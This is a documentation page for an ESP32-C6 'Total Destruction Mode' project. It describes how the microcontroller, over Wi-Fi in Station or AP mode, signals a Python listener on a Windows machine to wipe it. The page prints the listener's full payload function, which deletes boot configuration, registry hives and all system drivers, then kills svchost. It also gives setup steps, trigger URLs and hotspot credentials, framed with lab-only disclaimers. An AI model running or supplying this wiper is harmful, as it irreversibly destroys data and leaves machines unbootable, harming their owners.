Skip to main content
The ESP32-C6 Total Destruction Mode is a destructive security demonstration project that showcases the remote system manipulation capabilities of the ESP32-C6 microcontroller over Wi-Fi. It is built for educational and authorized lab testing only, illustrating how a small embedded device can serve as a trigger for irreversible actions on a connected Windows target machine. The project ships in two operational modes — Station and AP — so you can demonstrate the concept on whichever network topology your lab supports.
Authorized lab use only. This project is designed to cause a target Windows machine to permanently lose all data and become unbootable. Never run it on your own computer or any machine you do not have explicit written authorization to test. Only operate this in an isolated, controlled lab environment on dedicated test hardware with no recoverable data.

Operational Modes

The project provides two independent firmware + listener pairs. You choose the mode that fits your lab setup before flashing the ESP32-C6.

Station Mode

In Station Mode the ESP32-C6 joins your lab’s existing Wi-Fi network using a static IP address (192.168.1.253 by default). The Python listener (dinleyici_station.py) runs on the target Windows machine and polls the ESP32’s /durum endpoint every second. When you visit the ESP32’s web interface from a phone on the same network and press the trigger button, the ESP32 sets its status to SIL. The listener detects the change and immediately executes the destructive payload on the Windows host.

AP Mode

In AP Mode the ESP32-C6 creates its own Wi-Fi hotspot (HACK_DEMO / 12345678) and assigns itself the fixed IP 192.168.4.1. You connect the target Windows machine directly to that hotspot and run the listener. Destruction is triggered by navigating to 192.168.4.1/tetikle from any connected device — no external router is needed.

Network Architecture

Station Mode

┌─────────────────────────────────────────┐
│           Lab Wi-Fi Router              │
│         (192.168.1.1)                   │
└──────────┬──────────────────┬───────────┘
           │                  │
    ESP32 (253)         PC (DHCP)
    [Green LED]         [Listener Running]
           │                  │
           └──────Wifi────────┘
           Control Signals

AP Mode

┌──────────────────────────────┐
│  ESP32 Hotspot (AP Mode)     │
│  SSID: HACK_DEMO             │
│  IP: 192.168.4.1             │
└──────────┬───────────────────┘

           ├─ PC (192.168.4.2)
           │  [Listener Running]

           └─ Phone/Tablet
              [Web Interface]

What the Listener Does

When the listener receives the SIL (“delete”) signal from the ESP32, it executes four destructive actions in sequence on the target Windows machine. All four steps require the listener to run as Administrator.
  1. Deletes boot data — runs bcdedit /deleteall, preventing Windows from ever locating its boot configuration again.
  2. Destroys the registry — deletes HKEY_LOCAL_MACHINE\SYSTEM and HKEY_LOCAL_MACHINE\SOFTWARE, wiping all Windows settings and installed-software records.
  3. Removes system drivers — deletes every .sys file under C:\Windows\System32\drivers\, severing all hardware communication.
  4. Triggers a system crash — force-terminates svchost.exe and other critical processes, causing an immediate, unrecoverable crash.
The full payload from dinleyici_station.py:
def tam_imha():
    # 1. Delete boot configuration — Windows can never find its bootloader
    os.system("bcdedit /deleteall")

    # 2. Destroy the registry
    os.system(r'reg delete "HKEY_LOCAL_MACHINE\SYSTEM" /f')
    os.system(r'reg delete "HKEY_LOCAL_MACHINE\SOFTWARE" /f')

    # 3. Remove all kernel-mode drivers
    os.system(r"del /f /s /q C:\Windows\System32\drivers\*.sys")

    # 4. Force-terminate svchost to trigger an immediate crash
    os.system("taskkill /f /im svchost.exe")

Security Notes

Follow every precaution below before powering on the ESP32-C6 in this project:
  • Never run this on your own computer under any circumstances — the damage is irreversible.
  • Only deploy on dedicated test machines that contain no real data and are fully expendable.
  • Keep the network isolated — disconnect the lab network from the internet before starting.
  • Add firewall rules on the lab router to prevent any unauthorized device from reaching the ESP32 or the target machine.
  • Restrict physical access — ensure that nobody outside your authorized team can reach the ESP32 or the target machine.
  • Back up nothing on the target — assume all data on the test machine will be permanently destroyed, because it will be.
  • Run the listener as Administrator — the payload requires elevated privileges; without them you will receive WinError 5 and the destructive commands will silently fail.

Explore the Modes

Station Mode

Connect the ESP32-C6 to an existing lab Wi-Fi network and trigger destruction over a shared subnet.

AP Mode

Let the ESP32-C6 create its own hotspot and trigger destruction without any external router.

Build docs developers (and LLMs) love